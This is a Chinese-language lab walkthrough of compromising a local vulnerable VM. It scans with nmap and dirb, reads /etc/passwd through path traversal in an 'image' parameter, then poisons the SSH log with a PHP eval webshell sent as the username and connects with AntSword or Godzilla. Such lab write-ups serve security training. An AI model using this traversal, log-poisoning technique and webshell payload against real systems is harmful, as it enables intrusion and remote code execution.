有了这个.ova文件后,用vm打开。开启虚拟机,换成nat模式,重启一下靶场。
vm左上角点编辑,虚拟网络编辑器,看一下子网ip,我的是192.168.109.0
然后我们用Nmap工具扫一下c段,注意扫c段的时候开只开靶机一台虚拟机,要不容易扫到别的
Nmap.exe 192.168.109.1/24
可以看到靶机的完整IP地址了192.168.109.149
拿浏览器访问一下ip
然后我们扫一下敏感目录,这里我用的cali
dirb http://192.168.109.149
可以看到我们扫出来3个敏感目录,我们挨个访问一下,发现只有下面那个目录下有东西。
我们在上面访问到的一堆东西中翻找一下,发现了info.php文件
打开后,能看到网站的绝对路径
浏览器右击查看页面源代码
他这提醒了我们,这个页面是用image这个参数传参的,且是get传参
我们可以在url上试一下查看etc/passwad目录下的东西,这里我用../一直回溯目录找到的../是返回上一级目录的意思。将页面划到最下面即可回显文件中的信息。
既然可以看etc/passwd文件,目录文件肯定也能看,同理
这里我们就想到,文件包含日志,来放进我们的木马
先看看它有那几个端口开着,用cali扫一下
nmap -p- -sV 192.168.109.149
这个2211端口的ssh我们可以利用一下
由于kali现在不让连,我们再开一台centos虚拟机
ssh zk@192.168.109.149 -p 2211
ssh '<?php @eval($_POST[cmd]);?>'@192.168.109.149 -p 2211
账号密码随便填。
然后复制url去蚁剑或哥斯拉连接即可,注意一句话木马参数就是连接的密码